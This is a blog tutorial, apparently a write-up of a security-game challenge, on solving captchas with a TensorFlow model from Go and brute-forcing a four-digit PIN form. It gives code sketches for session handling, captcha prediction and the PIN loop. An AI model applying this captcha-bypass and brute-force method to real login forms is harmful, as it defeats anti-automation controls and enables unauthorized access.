Solving CAPTCHA with TensorFlow and Go
A robot that proves it’s not a robot way better than I do
This article was first published at GopherAcademy. The Medium version has been edited and slightly restructured.
Before the Blacklight event at DevFest Siberia, I was tasked with play-testing a specific challenge to prove that it could be cracked in a reasonable time. It was a challenge I face occasionally in my everyday life, not always with success: solving a bunch of captchas.
At DevFest, people had to break into a room without surveillance cameras capturing the break-in attempt. Disabling the camera required entering a four-digit security PIN into a CAPTCHA-protected form.
An input of a TensorFlow model requires doing some TensorFlow!
A Few Words about TensorFlow
TensorFlow is an open-source software library for Machine Intelligence, used mainly for machine learning applications such as neural networks.
TensorFlow runs computations involving tensors. There are many resources that explain what a tensor is, and this article is definitely not a sufficient one: it only has the bare minimum to make sense of what the code does. Tensors are awesome and complex mathematical objects, and I encourage you to take the time to learn more about them.
For our purposes, here is the explanation from the TensorFlow website:
A tensor is a generalization of vectors and matrices to potentially higher dimensions. Internally, TensorFlow represents tensors as n-dimensional arrays of base datatypes.
A tensor is defined by the data type of the values it holds and its shape, which is the number of dimensions and number of values per dimension.
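To make the shape part of that definition concrete, here is a minimal plain-Go sketch. It does not use the TensorFlow package, and the shapeOf helper is a hypothetical name introduced only for this illustration. It reports the shape of a nested slice the way the quote describes it: the number of dimensions and the number of values per dimension.

```go
package main

import "fmt"

// shapeOf returns the shape of a rectangular 2-D slice:
// the number of rows, then the number of values per row.
// It assumes every row has the same length, as a tensor requires.
func shapeOf(m [][]float32) []int {
	if len(m) == 0 {
		return []int{0, 0}
	}
	return []int{len(m), len(m[0])}
}

func main() {
	// A 2x3 matrix: a rank-2 tensor of float32 values.
	matrix := [][]float32{
		{1, 2, 3},
		{4, 5, 6},
	}
	shape := shapeOf(matrix)
	fmt.Println("rank:", len(shape), "shape:", shape) // rank: 2 shape: [2 3]
}
```

Here the data type is float32 and the shape is [2 3]: two dimensions, with two values along the first and three along the second.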
The “Flow” part of TensorFlow describes how the graph (model) is essentially a set of nodes (operations), and the data (tensors) “flows” through those nodes, undergoing mathematical manipulation. You can inspect and evaluate any node of the graph.
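The idea of data flowing through operations can be sketched with a toy graph in plain Go. This is only an illustration of the concept, not how TensorFlow implements its graph, and the node, eval and constant names are made up for the example.

```go
package main

import "fmt"

// node is one operation in a toy dataflow graph.
type node struct {
	name   string
	inputs []*node
	op     func(in []float64) float64
}

// eval computes the value of a node by first evaluating its inputs,
// so data "flows" from the leaves toward the requested node.
func eval(n *node) float64 {
	in := make([]float64, len(n.inputs))
	for i, dep := range n.inputs {
		in[i] = eval(dep)
	}
	return n.op(in)
}

// constant builds a leaf node that always yields v.
func constant(name string, v float64) *node {
	return &node{name: name, op: func([]float64) float64 { return v }}
}

func main() {
	a := constant("a", 2)
	b := constant("b", 3)
	sum := &node{name: "sum", inputs: []*node{a, b},
		op: func(in []float64) float64 { return in[0] + in[1] }}
	scaled := &node{name: "scaled", inputs: []*node{sum, b},
		op: func(in []float64) float64 { return in[0] * in[1] }}

	// Any node can be evaluated, not just the final one.
	fmt.Println(sum.name, eval(sum))       // sum 5
	fmt.Println(scaled.name, eval(scaled)) // scaled 15
}
```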
A Few Words about TensorFlow + Go
On the official TensorFlow website, you can find a page dedicated to Go describing the recommended use:
TensorFlow provides APIs for use in Go programs. These APIs are particularly well-suited to loading models created in Python and executing them within a Go application.
It also warns that the TensorFlow Go API is not covered by the TensorFlow API stability guarantees, although as of the date of this post, everything still works as expected.
The package page adds two more warnings:
- The API defined in this package is not stable and can change without notice.
- The package path is awkward and can change in the future as well: github.com/tensorflow/tensorflow/tensorflow/go
In theory, the Go APIs for TensorFlow are powerful enough to do anything you can do from the Python APIs, including training (Asim Shankar has a good example of training a model in Go using a graph written in Python). In practice, some workflows, particularly those for model construction, are very low-level and certainly not as convenient as in Python.
For now, it generally makes sense to define the model in TensorFlow for Python, export it, and then use the Go APIs for inference or training. So while Go might not be your first choice for working with TensorFlow, they do play nice together when using existing models.
Note: thanks to Asim Shankar from the TensorFlow team for pointing out that it is possible to train models with Go. We will collaborate further to make the documentation around this more accessible.
Let’s Break In
The interface I was facing seemed pretty close to your regular captcha-protected form. My TO DOs were:
- Inspect the model.
- Start with a boilerplate.
- Load the model.
- Fetch the captcha.
- Predict the captcha.
- Try to log in with the predicted captcha and a given PIN code.
- Iterate over all possible PIN codes.
1. Inspect the Model
SavedModel is the universal serialization format for TensorFlow models.
— TensorFlow documentation
We don’t know anything about the model, so our first step is to figure out the input and output nodes for prediction. The SavedModel format allows storing this information, called a signature, as metadata; the tool for inspecting signatures is the SavedModel CLI. Here’s the command and its output:
$ saved_model_cli show --dir ./tensorflow_savedmodel_captcha --all
MetaGraphDef with tag-set: 'serve' contains the following SignatureDefs:
signature_def['serving_default']:
The given SavedModel SignatureDef contains the following input(s):
name: CAPTCHA/input_image_as_bytes:0
The given SavedModel SignatureDef contains the following output(s):
name: CAPTCHA/prediction:0
Method name is: tensorflow/serving/predict
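What we learn from this are the node names used with the serve tag: the input node is CAPTCHA/input_image_as_bytes and the output node is CAPTCHA/prediction (the trailing :0 is the index of the operation’s output).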
2. Start with a Boilerplate
Let’s define constants for the camera URL and for the error messages we already know:
We’ll add log file support to our main() function to make sure everything is logged properly:
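A minimal sketch of such a logging setup could look like the following. The setupLog helper and the break-in.log file name are assumptions made for this example, not taken from the original code. It appends to a log file and mirrors every entry to stdout.

```go
package main

import (
	"io"
	"log"
	"os"
)

// setupLog opens (or creates) the log file at path in append mode and
// sends the standard logger's output to both the file and stdout.
// The caller is responsible for closing the returned file.
func setupLog(path string) (*os.File, error) {
	f, err := os.OpenFile(path, os.O_APPEND|os.O_CREATE|os.O_WRONLY, 0644)
	if err != nil {
		return nil, err
	}
	log.SetOutput(io.MultiWriter(f, os.Stdout))
	return f, nil
}

func main() {
	// "break-in.log" is a hypothetical file name.
	f, err := setupLog("break-in.log")
	if err != nil {
		log.Fatalf("cannot open log file: %v", err)
	}
	defer f.Close()

	log.Println("logging is set up")
}
```

Opening the file in append mode keeps the history of earlier runs, which is handy when a brute-force attempt is interrupted and restarted.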
And implement a logResponse function for our login attempts. If the response is unknown, we’ll output it in full. Otherwise we’ll add a short entry to either the logfile or stdout.
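One way to sketch that behavior is shown below. The response fragments and labels in knownResponses are hypothetical placeholders (the real messages come from the challenge form), and logEntry is a helper introduced only to keep the formatting separate from the logging.

```go
package main

import (
	"log"
	"strings"
)

// knownResponses maps hypothetical error fragments to short log labels.
// The real messages come from the challenge form.
var knownResponses = map[string]string{
	"wrong captcha": "captcha rejected",
	"wrong PIN":     "PIN rejected",
}

// logEntry builds the line to log for one login attempt: a short label
// for a known response, or the full body for anything unexpected.
func logEntry(pin, body string) string {
	for fragment, label := range knownResponses {
		if strings.Contains(body, fragment) {
			return "PIN " + pin + ": " + label
		}
	}
	return "PIN " + pin + ": unknown response:\n" + body
}

// logResponse writes the entry through the standard logger, which goes
// to stderr unless it has been redirected with log.SetOutput.
func logResponse(pin, body string) {
	log.Println(logEntry(pin, body))
}

func main() {
	logResponse("0042", "Error: wrong PIN")
	logResponse("0043", "<html>Camera disabled</html>")
}
```

Printing unknown responses in full matters here: the one response we have never seen before is most likely the success page.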
3. Load the Model
Now let’s load the model with LoadSavedModel. The full signature is:
func LoadSavedModel(exportDir string, tags []string, options *SessionOptions) (*SavedModel, error)
The function takes three arguments: the path, the tags and the session options. Explaining tags and options could easily take an entire post and would shift the focus, so for now you only need to know that serve is the tag used to serve TensorFlow models, and that session options are not required in our case.
4. Fetch the Captcha
Now let’s get the captcha image.
To keep the session tied to the generated captcha, we will first open a cookie jar. Even though it’s the first time I am writing about cookies publicly, I will spare you the cookie jokes as part of the Christmas spirit.
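Here is a sketch of the cookie jar approach using only the standard library. The newClient and fetchCaptcha helpers, the /captcha.png path and the fakeCamera test server are all assumptions made for this example; the real camera URL is not reproduced here.

```go
package main

import (
	"fmt"
	"io"
	"log"
	"net/http"
	"net/http/cookiejar"
	"net/http/httptest"
)

// newClient returns an HTTP client that stores cookies between requests,
// so the server can tie a later login attempt to the captcha it issued.
func newClient() (*http.Client, error) {
	jar, err := cookiejar.New(nil)
	if err != nil {
		return nil, err
	}
	return &http.Client{Jar: jar}, nil
}

// fetchCaptcha downloads the captcha image and returns its raw bytes.
func fetchCaptcha(client *http.Client, url string) ([]byte, error) {
	resp, err := client.Get(url)
	if err != nil {
		return nil, err
	}
	defer resp.Body.Close()
	if resp.StatusCode != http.StatusOK {
		return nil, fmt.Errorf("unexpected status: %s", resp.Status)
	}
	return io.ReadAll(resp.Body)
}

// fakeCamera is a stand-in server for this sketch only: it sets a session
// cookie on the first request and reports whether later requests carry it.
func fakeCamera() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if _, err := r.Cookie("session"); err != nil {
			http.SetCookie(w, &http.Cookie{Name: "session", Value: "abc"})
			fmt.Fprint(w, "new session")
			return
		}
		fmt.Fprint(w, "same session")
	}))
}

func main() {
	srv := fakeCamera()
	defer srv.Close()

	client, err := newClient()
	if err != nil {
		log.Fatal(err)
	}
	for i := 0; i < 2; i++ {
		body, err := fetchCaptcha(client, srv.URL+"/captcha.png")
		if err != nil {
			log.Fatal(err)
		}
		fmt.Printf("request %d: %s\n", i+1, body)
	}
}
```

The second request reuses the cookie stored by the first one, which is exactly what the login attempt needs in order to be matched with the captcha that was served.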
5. Predict the Captcha
To run a prediction we need to supply inputs, called feeds (operations to feed our data to, mapped to tensors containing the data), and outputs, called fetches (operations to fetch the data from).
We only have one feed (input):
- the feed operation is CAPTCHA/input_image_as_bytes;
- the feed tensor is a string containing the CAPTCHA image as bytes.
Likewise, there is only one fetch (output): the operation CAPTCHA/prediction.
After we run the model with our feeds and fetches, we receive the output — the captcha prediction.
6. Log In
Once the values — the PIN code and the captcha prediction — are there, let’s POST the request to disable the camera.
If the captcha prediction failed, we retry with the same PIN code.
The parseResponse function checks and reports whether the response is one of the known error messages, which I found manually by guessing PIN codes and making both correct and incorrect captcha predictions.
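The login step could be sketched as follows. The form field names, the error fragments, the outcome type and the fakeForm test server are all hypothetical; only the overall flow (POST the PIN with the predicted captcha, then classify the reply) comes from the description above.

```go
package main

import (
	"fmt"
	"io"
	"log"
	"net/http"
	"net/http/httptest"
	"net/url"
	"strings"
)

// Hypothetical error fragments and form field names; the real ones
// belong to the challenge form and are not given in this article.
const (
	wrongCaptchaMsg = "wrong captcha"
	wrongPINMsg     = "wrong PIN"
	pinField        = "pin"
	captchaField    = "captcha"
)

type outcome int

const (
	unknown      outcome = iota // not a known error; inspect the response in full
	wrongCaptcha                // prediction failed; retry with the same PIN
	wrongPIN                    // captcha accepted; move on to the next PIN
)

// parseResponse reports which known error message, if any, the body contains.
func parseResponse(body string) outcome {
	switch {
	case strings.Contains(body, wrongCaptchaMsg):
		return wrongCaptcha
	case strings.Contains(body, wrongPINMsg):
		return wrongPIN
	default:
		return unknown
	}
}

// tryLogin POSTs the PIN and the predicted captcha as form values
// and classifies the server's reply.
func tryLogin(client *http.Client, target, pin, captcha string) (outcome, error) {
	resp, err := client.PostForm(target, url.Values{
		pinField:     {pin},
		captchaField: {captcha},
	})
	if err != nil {
		return unknown, err
	}
	defer resp.Body.Close()
	body, err := io.ReadAll(resp.Body)
	if err != nil {
		return unknown, err
	}
	return parseResponse(string(body)), nil
}

// fakeForm is a stand-in server for this sketch: it accepts only the
// captcha "k3x9" and rejects every PIN.
func fakeForm() *httptest.Server {
	return httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if r.FormValue(captchaField) != "k3x9" {
			fmt.Fprint(w, wrongCaptchaMsg)
			return
		}
		fmt.Fprint(w, wrongPINMsg)
	}))
}

func main() {
	srv := fakeForm()
	defer srv.Close()

	got, err := tryLogin(srv.Client(), srv.URL, "0000", "k3x9")
	if err != nil {
		log.Fatal(err)
	}
	fmt.Println(got == wrongPIN) // true
}
```

Keeping the classification in its own function means the retry decision (same PIN or next PIN) depends on a small value rather than on string matching scattered through the main loop.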
7. Iterate over All Possible PIN Codes
The PIN code has only 4 digits, so we’ll just go over all 10,000 combinations. Each iteration needs the loaded model for the prediction step and, of course, some logging.
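The brute-force loop itself can be sketched independently of the network and the model. In the example below, attemptFunc stands in for "fetch a captcha, predict it, POST the form", and the retry cap maxRetries is my own assumption to keep a failing predictor from looping forever; neither name comes from the original code.

```go
package main

import "fmt"

// attemptFunc tries one PIN and reports whether the captcha was accepted
// and whether the PIN was correct. It is injected so the loop can be
// shown (and tested) on its own.
type attemptFunc func(pin string) (captchaOK, pinOK bool)

// bruteForce walks through 0000..9999, retrying the same PIN up to
// maxRetries times whenever the captcha prediction is rejected.
// It returns the matching PIN, or "" if none was found.
func bruteForce(try attemptFunc, maxRetries int) string {
	for i := 0; i < 10000; i++ {
		pin := fmt.Sprintf("%04d", i) // zero-padded: 7 becomes "0007"
		for retry := 0; retry <= maxRetries; retry++ {
			captchaOK, pinOK := try(pin)
			if !captchaOK {
				continue // same PIN, fresh captcha
			}
			if pinOK {
				return pin
			}
			break // captcha fine, PIN wrong: next PIN
		}
	}
	return ""
}

func main() {
	calls := 0
	// A fake attempt: every third captcha "fails", and the secret PIN is 0042.
	fake := func(pin string) (bool, bool) {
		calls++
		if calls%3 == 0 {
			return false, false
		}
		return true, pin == "0042"
	}
	fmt.Println(bruteForce(fake, 5)) // 0042
}
```

The zero-padding is the detail that is easiest to get wrong: iterating over integers and formatting them with %04d covers codes such as 0007 that a plain integer-to-string conversion would miss.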
To Wrap This Up
The full code after everything is composed together is available on GitHub: Pisush/break-captcha-tensorflow.
TensorFlow has many models which can all be used with Go. There is a great list of those at tensorflow/models.
The pre-trained model provided for the challenge is based on emedvedev/attention-ocr.
Online challenges can be an awesome way to learn, whether it’s coding, security or sports. The combination of putting your knowledge into practice and having a mission creates a fun environment where you can work on improving your skills. Consider joining such a challenge as your New Year’s resolution.
Even more stories about solving captchas, picking locks and investigating conspiracies: @blacklightai on Twitter.